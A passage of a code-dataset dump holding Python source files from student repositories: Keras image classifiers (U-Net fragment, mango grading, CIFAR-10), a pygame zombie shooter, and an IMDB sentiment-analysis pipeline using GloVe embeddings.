MaxPooling2D(pool_size=(2, 2))(conv3)\r\n conv4 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)\r\n conv4 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)\r\n drop4 = Dropout(0.5)(conv4)\r\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\r\n\r\n conv5 = Conv2D(1024, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)\r\n conv5 = Conv2D(1024, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)\r\n drop5 = Dropout(0.5)(conv5)\r\n\r\n up6 = Conv2D(512, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n UpSampling2D(size=(2, 2))(drop5))\r\n merge6 = concatenate([drop4, up6], axis=3)\r\n conv6 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge6)\r\n conv6 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv6)\r\n\r\n up7 = Conv2D(256, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n UpSampling2D(size=(2, 2))(conv6))\r\n merge7 = concatenate([conv3, up7], axis=3)\r\n conv7 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)\r\n conv7 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)\r\n\r\n up8 = Conv2D(128, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n UpSampling2D(size=(2, 2))(conv7))\r\n merge8 = concatenate([conv2, up8], axis=3)\r\n conv8 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)\r\n conv8 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)\r\n\r\n up9 = Conv2D(64, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n UpSampling2D(size=(2, 2))(conv8))\r\n merge9 = concatenate([conv1, up9], axis=3)\r\n conv9 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)\r\n conv9 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\r\n conv9 = Conv2D(2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\r\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\r\n\r\n model = Model(inputs=inputs, outputs=conv10)\r\n\r\n model.compile(optimizer=Adam(lr=1e-4), loss='binary_crossentropy', metrics=['accuracy'])\r\n\r\n # model.summary()\r\n\r\n if 
(pretrained_weights):\r\n model.load_weights(pretrained_weights)\r\n\r\n return model\r\n# Prediction\r\n\r\n#\r\n" }, { "alpha_fraction": 0.6234708428382874, "alphanum_fraction": 0.6469416618347168, "avg_line_length": 27.79660987854004, "blob_id": "afd6ef9e6fc423525ef378980796518a5425218a", "content_id": "f185136ff130074cdc57422b6d31a3d9484fc647", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7064, "license_type": "no_license", "max_line_length": 105, "num_lines": 236, "path": "/hw2_group6/hw2_group6_Mango.py", "repo_name": "Yi-YunSung/109-2MachineLearning", "src_encoding": "UTF-8", "text": "# Import modules\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom sklearn.utils import shuffle\r\n\r\nprint(os.listdir('/Users/User/Desktop/Data_Mango'))\r\nprint(os.listdir('/Users/User/Desktop/Data_Mango/Train_Image'))\r\n\r\n# Read the data\r\ntrainPath = '/Users/User/Desktop/Data_Mango/Train_Image/'\r\ntestPath = '/Users/User/Desktop/Data_Mango/Test_Image/'\r\n\r\ntrainCSV = '/Users/User/Desktop/Data_Mango/train.csv'\r\ntestCSV = '/Users/User/Desktop/Data_Mango/Test.csv'\r\n\r\ntrainDF = pd.read_csv(trainCSV)\r\nprint(trainDF)\r\ntrainFiles = trainDF['image_id'].tolist()\r\ntrainClasses = trainDF['label'].tolist()\r\n\r\ntestDF = pd.read_csv(testCSV)\r\nprint(testDF)\r\ntestFiles = testDF['image_id'].tolist()\r\ntestClasses = testDF['label'].tolist()\r\n\r\nlabels = ['A', 'B', 'C']\r\n\r\n# Image preprocessing\r\ndef plot_equilibre(equilibre, labels, title):\r\n plt.figure(figsize=(5,5))\r\n my_circle=plt.Circle( (0,0), 0.5, color='white')\r\n plt.pie(equilibre, labels=labels, colors=['red','green','blue'],autopct='%1.1f%%')\r\n p=plt.gcf()\r\n p.gca().add_artist(my_circle)\r\n plt.title(title)\r\n plt.show()\r\n\r\nequilibreTrain = []\r\n[equilibreTrain.append(trainClasses.count(label)) for label in labels]\r\n#print(equilibreTrain)\r\nplot_equilibre(equilibreTrain, labels, 'Train Data')\r\ndel equilibreTrain\r\n\r\nequilibreTest = []\r\n[equilibreTest.append(testClasses.count(label)) for label in labels]\r\n#print(equilibreTest)\r\nplot_equilibre(equilibreTest, labels, 'Test Data')\r\ndel equilibreTest\r\n\r\nTargetSize = (192, 144) # image ratio = 4:3\r\ndef prepare_image(filepath):\r\n img = cv2.imread(filepath)\r\n # get image height, width\r\n (h, w) = img.shape[:2]\r\n if (w<h): # rotate270\r\n # calculate the center of the image\r\n center = (w / 2, h / 2)\r\n M = cv2.getRotationMatrix2D(center, 270, 1.0)\r\n img = cv2.warpAffine(img, M, (h, w))\r\n img_resized = cv2.resize(img, TargetSize, interpolation=cv2.INTER_CUBIC)\r\n img_result = cv2.cvtColor(img_resized, cv2.COLOR_BGR2RGB)\r\n return img_result\r\n\r\n#plt.imshow(prepare_image(trainPath + trainFiles[1]))\r\n#plt.imshow(prepare_image(testPath + '/'+ testFiles[1]))\r\n\r\n\r\n'''\r\ntraining data\r\n'''\r\n# Training data\r\ntrainX = []\r\n[trainX.append(prepare_image(trainPath+file)) for file in trainFiles]\r\ntrainX = np.asarray(trainX)\r\nprint(trainX.shape)\r\n\r\n# data normalisation\r\ntrainX = trainX / 255.0\r\n\r\n# Convert Y_data from {'A','B','C'} to {0,1,2}\r\ntrainY = []\r\n[trainY.append(ord(trainClass) - 65) for trainClass in trainClasses]\r\n#print(trainY)\r\n\r\n# one-hot encoding\r\ntrainY = to_categorical(trainY)\r\n\r\n\r\n'''\r\ntesting data\r\n'''\r\ntestX = []\r\n[testX.append(prepare_image(testPath+file)) for file in testFiles]\r\ntestX = np.asarray(testX)\r\nprint(testX.shape)\r\n\r\n# 
data normalisation\r\ntestX = testX / 255.0\r\n\r\n# Convert Y_data from char to integer\r\ntestY = []\r\n[testY.append(ord(testClass) - 65) for testClass in testClasses]\r\n#print(testY)\r\n\r\n# one-hot encoding\r\ntestY = to_categorical(testY)\r\n\r\ntrainX, trainY = shuffle(trainX, trainY, random_state=42)\r\nnum_classes = 3\r\n\r\n'''\r\nbuild model\r\n'''\r\n\r\nfrom tensorflow.keras.models import Model\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, GlobalAveragePooling2D\r\nfrom tensorflow.keras.layers import Input, BatchNormalization, Activation, LeakyReLU, Concatenate\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\n\r\ninput_shape = trainX.shape[1:]\r\nprint(trainX.shape[1:])\r\n\r\n# Build Model\r\n\r\ninput_image = Input(shape=input_shape)\r\n# 1st Conv layer\r\nmodel = Conv2D(16, (3, 3), activation='relu', padding='same', input_shape=input_shape)(input_image)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# 2nd Conv layer\r\nmodel = Conv2D(32, (3, 3), activation='relu', padding='same')(model)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# 3rd Conv layer\r\nmodel = Conv2D(64, (3, 3), activation='relu', padding='same')(model)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# 4th Conv layer\r\nmodel = Conv2D(128, (3, 3), activation='relu', padding='same')(model)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# 5th Conv layer\r\nmodel = Conv2D(256, (3, 3), activation='relu', padding='same')(model)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# FC layers\r\nmodel = Flatten()(model)\r\n\r\n#model = Dense(1024, kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01))(model)\r\nmodel = Dense(1024)(model)\r\n#model = Dropout(0.2)(model)\r\n\r\n#model = Dense(64, kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01))(model)\r\nmodel = Dense(64)(model)\r\n#model = Dropout(0.2)(model)\r\n\r\noutput= Dense(num_classes, activation='softmax')(model)\r\n\r\nmodel = Model(inputs=[input_image], outputs=[output])\r\n\r\nmodel.summary()\r\n\r\n# Compile Model\r\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n'''\r\ntrain model\r\n'''\r\n\r\nbatch_size = 256\r\nnum_epochs = 20\r\n\r\n# Train Model\r\nhistory = model.fit(trainX,trainY,batch_size=batch_size,epochs=num_epochs) #, callbacks=[checkpoint])\r\n\r\npredY = model.predict(testX)\r\ny_pred = np.argmax(predY,axis=1)\r\ny_actual = np.argmax(testY,axis=1)\r\n#y_label= [labels[k] for k in y_pred]\r\ncm = confusion_matrix(y_actual, y_pred)\r\nprint(cm)\r\n\r\n'''\r\nconfusion matrix\r\n'''\r\n\r\nimport itertools\r\n\r\n\r\ndef plot_confusion_matrix(cm,\r\n target_names,\r\n title='Confusion matrix',\r\n cmap=None,\r\n normalize=True):\r\n accuracy = np.trace(cm) / float(np.sum(cm))\r\n misclass = 1 - accuracy\r\n\r\n if cmap is None:\r\n cmap = plt.get_cmap('Blues')\r\n\r\n plt.figure(figsize=(8, 6))\r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n plt.title(title)\r\n plt.colorbar()\r\n\r\n if target_names is not None:\r\n tick_marks = np.arange(len(target_names))\r\n plt.xticks(tick_marks, target_names, rotation=45)\r\n plt.yticks(tick_marks, target_names)\r\n\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n thresh = cm.max() / 1.5 if normalize else cm.max() / 2\r\n\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n if normalize:\r\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\r\n 
horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n else:\r\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n\r\n plt.tight_layout()\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label\\naccuracy={:0.4f}; misclass={:0.4f}'.format(accuracy, misclass))\r\n plt.show()\r\n\r\nplot_confusion_matrix(cm,\r\n normalize=False,\r\n target_names = labels,\r\n title=\"Confusion Matrix, not Normalized\")\r\n\r\nprint(model.evaluate(trainX, trainY))\r\n\r\nprint(classification_report(y_actual, y_pred, target_names=labels))" }, { "alpha_fraction": 0.6226672530174255, "alphanum_fraction": 0.6458807587623596, "avg_line_length": 30.562963485717773, "blob_id": "e393f5041037a919ff443a2b9ea1d7114c48c773", "content_id": "f1810c1eb5cdb58e9624411ac095b08c0ca4e3f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5048, "license_type": "no_license", "max_line_length": 71, "num_lines": 135, "path": "/hw2_group6/hw2_group6_Cifar10.py", "repo_name": "Yi-YunSung/109-2MachineLearning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\r\nimport tensorflow\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.datasets import cifar10\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\r\nfrom tensorflow.keras.utils import to_categorical\r\nimport os\r\nimport numpy as np\r\n\r\nbatch_size = 32\r\nnum_classes = 10\r\nepochs = 30\r\ndata_augmentation = True\r\nnum_predictions = 20\r\nsave_dir = os.path.join(os.getcwd(), 'saved_models')\r\nmodel_name = 'keras_cifar10_trained_model.h5'\r\n\r\n# Split the data into training and test sets\r\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\nprint('x_train shape:', x_train.shape)\r\nprint(x_train.shape[0], 'train samples')\r\nprint(x_test.shape[0], 'test samples')\r\n\r\n# Convert class vectors to binary class matrices\r\ny_train = keras.utils.to_categorical(y_train, num_classes)\r\ny_test = keras.utils.to_categorical(y_test, num_classes)\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, (3, 3), padding='same',\r\n input_shape=x_train.shape[1:]))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Conv2D(32, (3, 3)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\n\r\nmodel.add(Conv2D(64, (3, 3), padding='same'))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Conv2D(64, (3, 3)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Dense(512))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(num_classes))\r\nmodel.add(Activation('softmax'))\r\n\r\n# Initialize the RMSprop optimizer\r\nopt = tensorflow.keras.optimizers.RMSprop(lr=0.0001, decay=1e-6)\r\n\r\n# Compile the model with RMSprop\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer=opt,\r\n metrics=['accuracy'])\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\n\r\nif not data_augmentation:\r\n print('Not using data augmentation.')\r\n model.fit(x_train, y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n validation_data=(x_test, y_test),\r\n shuffle=True)\r\nelse:\r\n print('Using real-time data augmentation.')\r\n # 
This step performs data preprocessing and real-time data augmentation:\r\n datagen = ImageDataGenerator(\r\n featurewise_center=False, # set input mean to 0 over the dataset\r\n samplewise_center=False, # set each sample mean to 0\r\n featurewise_std_normalization=False, # divide inputs by std of the dataset\r\n samplewise_std_normalization=False, # divide each input by its std\r\n zca_whitening=False, # apply ZCA whitening\r\n zca_epsilon=1e-06, # epsilon for ZCA whitening\r\n rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\r\n # randomly shift images horizontally (fraction of total width)\r\n width_shift_range=0.1,\r\n # randomly shift images vertically (fraction of total height)\r\n height_shift_range=0.1,\r\n shear_range=0., # set range for random shear\r\n zoom_range=0., # set range for random zoom\r\n channel_shift_range=0., # set range for random channel shifts\r\n # set mode for filling points outside the input boundaries\r\n fill_mode='nearest',\r\n cval=0., # value used for fill_mode = \"constant\"\r\n horizontal_flip=True, # randomly flip images horizontally\r\n vertical_flip=False, # randomly flip images vertically\r\n # set rescaling factor (applied before any other transformation)\r\n rescale=None,\r\n # set function that will be applied on each input\r\n preprocessing_function=None,\r\n # image data format, either \"channels_first\" or \"channels_last\"\r\n data_format=None,\r\n # fraction of images reserved for validation (strictly between 0 and 1)\r\n validation_split=0.0)\r\n\r\n # Compute quantities required for feature-wise normalization\r\n # (std, mean, and principal components if ZCA whitening is applied).\r\n datagen.fit(x_train)\r\n\r\n # Fit the model on the batches generated by datagen.flow()\r\n model.fit_generator(datagen.flow(x_train, y_train,\r\n batch_size=batch_size),\r\n epochs=epochs,\r\n validation_data=(x_test, y_test),\r\n workers=4)\r\n\r\n# Save the model and weights\r\nif not os.path.isdir(save_dir):\r\n os.makedirs(save_dir)\r\nmodel_path = os.path.join(save_dir, model_name)\r\nmodel.save(model_path)\r\nprint('Saved trained model at %s ' % model_path)\r\n\r\n# Evaluate the trained model\r\nscores = model.evaluate(x_test, y_test, verbose=1)\r\nprint('Test loss:', scores[0])\r\nprint('Test accuracy:', scores[1])\r\n\r\n# Predict labels for the test data\r\ntestPred = np.argmax(model.predict(x_test), axis=1)\r\n\r\n# Compute the confusion matrix\r\nfrom sklearn.metrics import confusion_matrix, classification_report\r\ntestLabels_class = np.argmax(y_test, axis=1)\r\nprint(classification_report(testLabels_class, testPred))" } ]
3
zom-rpg/the_game
https://github.com/zom-rpg/the_game
5b00e321406ac5f42241c3928463bed398ae6592
055b17d43f519565c2e42c578558ee6bdab9db07
25f9435cc627fd7f0cc3eb5f6d087a99193f9718
refs/heads/master
2016-08-06T17:23:22.074242
2013-02-21T19:11:03
2013-02-21T19:11:03
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5, "alphanum_fraction": 0.5, "avg_line_length": 5.75, "blob_id": "8f169cfa5ae77ea71abf489e7d25e13faed8403b", "content_id": "3299d7389ac7cfa93062f522b812fb810a1db9cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 26, "license_type": "no_license", "max_line_length": 8, "num_lines": 4, "path": "/README.md", "repo_name": "zom-rpg/the_game", "src_encoding": "UTF-8", "text": "the_game\n========\n\nZOM-RPG" }, { "alpha_fraction": 0.5619877576828003, "alphanum_fraction": 0.5980226397514343, "avg_line_length": 29.569721221923828, "blob_id": "6a32e4501045673c7afa5165e072a921fbe3d8f9", "content_id": "c5d203502db05fdc555f37f12fec7732ab6a9b03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7687, "license_type": "no_license", "max_line_length": 79, "num_lines": 251, "path": "/Init-test/zom-rpg-sprite-test.py", "repo_name": "zom-rpg/the_game", "src_encoding": "UTF-8", "text": "# Zombie Mob Game\n# Chapter 8\n\nimport itertools, sys, time, random, math, pygame\nfrom pygame.locals import *\nfrom MyLibrary import *\n\nclass Bullet():\n def __init__(self, position):\n self.alive = True\n self.color = (250,20,20)\n self.position = Point(position.x,position.y)\n self.velocity = Point(0,0)\n self.rect = Rect(0,0,4,4)\n\n def update(self,ticks):\n self.position.x += self.velocity.x * 10.0\n self.position.y += self.velocity.y * 10.0\n if self.position.x < 0 or self.position.x > 800 \\\n or self.position.y < 0 or self.position.y > 600:\n self.alive = False\n self.rect = Rect(self.position.x, self.position.y, 4, 4)\n\n def draw(self,surface):\n pos = (int(self.position.x), int(self.position.y))\n pygame.draw.circle(surface, self.color, pos, 4, 0)\n\ndef fire_gun(direction):\n position = Point(player.X+40, player.Y+40)\n bullet = Bullet(position)\n bullet.velocity = calc_velocity(direction, 2.5)\n bullets.append(bullet)\n\ndef calc_velocity(direction, vel=1.0):\n velocity = Point(0,0)\n if direction == 0: #north\n velocity.y = -vel\n elif direction == 2: #east\n velocity.x = vel\n elif direction == 4: #south\n velocity.y = vel\n elif direction == 6: #west\n velocity.x = -vel\n return velocity\n\ndef reverse_direction(sprite):\n if sprite.direction == 0:\n sprite.direction = 4\n elif sprite.direction == 2:\n sprite.direction = 6\n elif sprite.direction == 4:\n sprite.direction = 0\n elif sprite.direction == 6:\n sprite.direction = 2\n\n#main program begins\nglobal bullets\nbullets = list()\npygame.init()\nscreen = pygame.display.set_mode((800,600))\nbackbuffer = pygame.Surface((800,600))\npygame.display.set_caption(\"Collision Demo\")\nfont = pygame.font.Font(None, 36)\ntimer = pygame.time.Clock()\n\n#create sprite groups\nplayer_group = pygame.sprite.Group()\nzombie_group = pygame.sprite.Group()\nhealth_group = pygame.sprite.Group()\nsupplies_group = pygame.sprite.Group()\n\n\n#create the player sprite\nplayer = MySprite()\nplayer.load(\"Walk.png\", 88.8, 88.8, 9)\nplayer.position = 80, 80\nplayer.direction = 4\nplayer_group.add(player)\nfire_timer = 0\n\n#create the zombie sprite\nzombie_image = pygame.image.load(\"zombie walk.png\").convert_alpha()\nfor n in range(0, 10):\n zombie = MySprite()\n zombie.load(\"zombie walk.png\", 96, 96, 8)\n zombie.position = random.randint(0,700), random.randint(0,500)\n zombie.direction = random.randint(0,3) * 2\n zombie_group.add(zombie)\n\n#create health sprite\nhealth = MySprite()\nhealth.load(\"health.png\", 40, 40, 
1)\nhealth.position = 400,300\nhealth_group.add(health)\n\n#create supply sprite\nsupplies = MySprite()\nsupplies.load(\"supplycrate.png\", 40, 40, 1)\nsupplies.position = 100,100\nsupplies_group.add(supplies)\n\n#game variables\ngame_over = False\nplayer_moving = False\nplayer_health = 100\nplayer_score = 0\n\n\n#repeating loop\nwhile True:\n timer.tick(30)\n ticks = pygame.time.get_ticks()\n\n for event in pygame.event.get():\n if event.type == QUIT: sys.exit()\n keys = pygame.key.get_pressed()\n if keys[K_ESCAPE]: sys.exit()\n elif keys[K_UP] or keys[K_w]:\n player.direction = 0\n player_moving = True\n elif keys[K_RIGHT] or keys[K_d]:\n player.direction = 2\n player_moving = True\n elif keys[K_DOWN] or keys[K_s]:\n player.direction = 4\n player_moving = True\n elif keys[K_LEFT] or keys[K_a]:\n player.direction = 6\n player_moving = True\n else:\n player_moving = False\n if keys[K_j]:\n if fire_timer == 0:\n fire_gun(player.direction)\n fire_timer = 100\n elif fire_timer > 0:\n fire_timer -= 10\n\n\n if not game_over:\n #set animation frames based on player's direction\n player.first_frame = player.direction * player.columns\n player.last_frame = player.first_frame + player.columns-1\n if player.frame < player.first_frame:\n player.frame = player.first_frame\n\n if not player_moving:\n #stop animating when player is not pressing a key\n player.frame = player.first_frame = player.last_frame\n else:\n #move player in direction \n player.velocity = calc_velocity(player.direction, 2.5)\n player.velocity.x *= 2.5\n player.velocity.y *= 2.5\n\n #update player sprite\n player_group.update(ticks, 50)\n\n #manually move the player\n if player_moving:\n player.X += player.velocity.x\n player.Y += player.velocity.y\n if player.X < 0: player.X = 0\n elif player.X > 700: player.X = 700\n if player.Y < 0: player.Y = 0\n elif player.Y > 500: player.Y = 500\n\n #update zombie sprites\n zombie_group.update(ticks, 50)\n\n #manually iterate through all the zombies\n for z in zombie_group:\n #set the zombie's animation range\n z.first_frame = z.direction * z.columns\n z.last_frame = z.first_frame + z.columns-1\n if z.frame < z.first_frame:\n z.frame = z.first_frame\n z.velocity = calc_velocity(z.direction)\n\n #keep the zombie on the screen \n z.X += z.velocity.x\n z.Y += z.velocity.y\n if z.X < 0 or z.X > 700 or z.Y < 0 or z.Y > 500:\n reverse_direction(z)\n \n\n #check for collision with zombies\n attacker = None\n attacker = pygame.sprite.spritecollideany(player, zombie_group)\n if attacker != None:\n #we got a hit, now do a more precise check\n if pygame.sprite.collide_rect_ratio(0.5)(player,attacker):\n player_health -= 10\n if attacker.X < player.X: attacker.X -= 10\n elif attacker.X > player.X: attacker.X += 10\n else:\n attacker = None\n\n #update the health drop\n health_group.update(ticks, 50)\n\n #check for collision with health\n if pygame.sprite.collide_rect_ratio(0.5)(player,health):\n player_health += 30\n if player_health > 100: player_health = 100\n health.X = random.randint(0,700)\n health.Y = random.randint(0,500)\n \n supplies_group.update(ticks, 50)\n \n if pygame.sprite.collide_rect_ratio(0.5)(player,supplies):\n player_score += 1\n supplies.X = random.randint(0,700)\n supplies.Y = random.randint(0,500)\n \n #update bullets\n for bullet in bullets:\n bullet.update(ticks)\n victim = None\n victim = pygame.sprite.spritecollideany(bullet, zombie_group)\n if victim != None:\n bullet.alive = False\n bullets.remove(bullet)\n zombie_group.remove(victim)\n \n\n #is player dead?\n if 
player_health <= 0:\n game_over = True\n\n\n #clear the screen\n backbuffer.fill((50,50,100))\n\n #draw sprites\n supplies_group.draw(backbuffer)\n health_group.draw(backbuffer)\n zombie_group.draw(backbuffer)\n player_group.draw(backbuffer)\n for bullet in bullets:\n bullet.draw(backbuffer)\n screen.blit(backbuffer, (0,0))\n\n #set up UI items\n pygame.draw.rect(screen, (50,150,50,180), Rect(300,570,player_health*2,25))\n pygame.draw.rect(screen, (100,200,100,180), Rect(300,570,200,25), 2)\n print_text(font, 0, 0, \"SUPPLIES COLLECTED: \" + str(player_score))\n if game_over:\n print_text(font, 300, 100, \"G A M E O V E R\")\n \n pygame.display.update()\n\n \n" } ]
2
roseway/sentiment-analysis
https://github.com/roseway/sentiment-analysis
d41a1bdb4f92a51db3aedbfa705cc4a232b6eb6c
e0f26bfb02a907b43fd9492fd01f9ccd0991eee6
28cd68f8ec3a994f45a56cf1b757582651476cc3
refs/heads/master
2020-04-11T11:38:23.128794
2018-12-14T08:43:29
2018-12-14T08:43:29
161,754,756
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.74349445104599, "alphanum_fraction": 0.7583643198013306, "avg_line_length": 66, "blob_id": "0d606dbfd27b860015ac2a9caa22cefd8e10c8f7", "content_id": "195a44a204cdc31047c5fa0421a496bb46692fb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 269, "license_type": "no_license", "max_line_length": 95, "num_lines": 4, "path": "/README.MD", "repo_name": "roseway/sentiment-analysis", "src_encoding": "UTF-8", "text": "1. Download imdb sentiment analysis dataset from http://ai.stanford.edu/~amaas/data/sentiment/.\n2. Download GloVe word embedding from https://nlp.stanford.edu/projects/glove/.\n3. Modify the paths in `main.py` accordingly.\n4. Run `extract_vocab.py`, then run `main.py`\n\n" }, { "alpha_fraction": 0.5631458163261414, "alphanum_fraction": 0.5700344443321228, "avg_line_length": 26.21875, "blob_id": "57965c2d3b311676fde8964bac229af73bbec310", "content_id": "669e247d43b3a1da569717b7c1bf4161be84c982", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1742, "license_type": "no_license", "max_line_length": 60, "num_lines": 64, "path": "/utils.py", "repo_name": "roseway/sentiment-analysis", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom string import punctuation\nfrom os import listdir\n\n\ndef load_emb(filename, vocab):\n f = open(filename, 'r', encoding='UTF-8')\n lines = f.readlines()\n f.close()\n vocab_size = len(vocab) + 1\n wordlist = np.zeros((vocab_size, 300))\n embedding = dict()\n for line in lines:\n x = line.split()\n embedding[x[0]] = np.asarray(x[1:], dtype='float32')\n for word, i in vocab.items():\n vector = embedding.get(word)\n if vector is not None:\n wordlist[i] = vector\n return wordlist\n\n\ndef load_doc(filename):\n # open the file as read only\n file = open(filename, 'r', encoding='UTF-8')\n # read all text\n text = file.read()\n # close the file\n file.close()\n return text\n\n\ndef clean_doc(doc, vocab):\n # split into tokens by white space\n doc = doc.replace('<br />', ' ')\n tokens = doc.split()\n # remove punctuation from each token\n table = str.maketrans('', '', punctuation)\n tokens = [w.translate(table) for w in tokens]\n # filter out tokens\n tokens = [w for w in tokens if w in vocab]\n tokens = ' '.join(tokens)\n return tokens\n\n\ndef prepare(directory, vocab, num=False):\n documents = list()\n if num:\n i = 1\n for filename in listdir(directory):\n path = directory + '/' + filename\n doc = load_doc(path)\n tokens = clean_doc(doc, vocab)\n documents.append(tokens)\n if i >= num:\n break\n i += 1\n else:\n for filename in listdir(directory):\n path = directory + '/' + filename\n doc = load_doc(path)\n tokens = clean_doc(doc, vocab)\n documents.append(tokens)\n return documents\n" }, { "alpha_fraction": 0.6664648652076721, "alphanum_fraction": 0.6682808995246887, "avg_line_length": 27.482759475708008, "blob_id": "1be2c119171cbef85d957a6dae927cd925fe5bc1", "content_id": "f37788fa6a67658fbce09633f954145d3e4d4260", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1652, "license_type": "no_license", "max_line_length": 64, "num_lines": 58, "path": "/extract_vocab.py", "repo_name": "roseway/sentiment-analysis", "src_encoding": "UTF-8", "text": "from utils import load_doc\nfrom string import punctuation\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom os import listdir\n\nmin_occur = 2\ndoc_dir = ['data/Imdb/train/neg', 
'data/Imdb/train/pos']\nsave_vocab = 'data/vocab.txt'\n\n\ndef clean_doc(doc):\n # split into tokens by white space\n doc = doc.replace('<br />', ' ')\n tokens = doc.split()\n # remove punctuation from each token\n table = str.maketrans('', '', punctuation)\n tokens = [w.translate(table) for w in tokens]\n # remove remaining tokens that are not alphabetic\n tokens = [word.lower() for word in tokens if word.isalpha()]\n # filter out stop words\n stop_words = set(stopwords.words('english'))\n tokens = [w for w in tokens if w not in stop_words]\n # filter out short tokens\n tokens = [word for word in tokens if len(word) > 1]\n return tokens\n\n\ndef add_doc_to_vocab(filename, vocab):\n # load doc\n doc = load_doc(filename)\n # clean doc\n tokens = clean_doc(doc)\n # update counts\n vocab.update(tokens)\n\n\ndef process_docs(directory, vocab):\n for filename in listdir(directory):\n # create the full path of the file to open\n path = directory + '/' + filename\n # add doc to vocab\n add_doc_to_vocab(path, vocab)\n\n\nprint(\"Extracting vocabulary\")\nvocab = Counter()\n# add all docs to vocab\nfor dire in doc_dir:\n process_docs(dire, vocab)\n# keep tokens with a min occurrence\ntokens = [k for k, c in vocab.items() if c >= min_occur]\n# convert lines to a single blob of text\ndata = '\\n'.join(tokens)\nfile = open(save_vocab, 'w', encoding='UTF-8')\nfile.write(data)\nfile.close()\nprint(\"Done\")\n" }, { "alpha_fraction": 0.7279050946235657, "alphanum_fraction": 0.7487725019454956, "avg_line_length": 36.030303955078125, "blob_id": "4d39613e39dc4a4a12e38184f0d6bf13ef44d285", "content_id": "fbbdfe5967ad037e51756783d8396cb801d03848", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2444, "license_type": "no_license", "max_line_length": 106, "num_lines": 66, "path": "/main.py", "repo_name": "roseway/sentiment-analysis", "src_encoding": "UTF-8", "text": "from utils import *\nimport numpy as np\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom 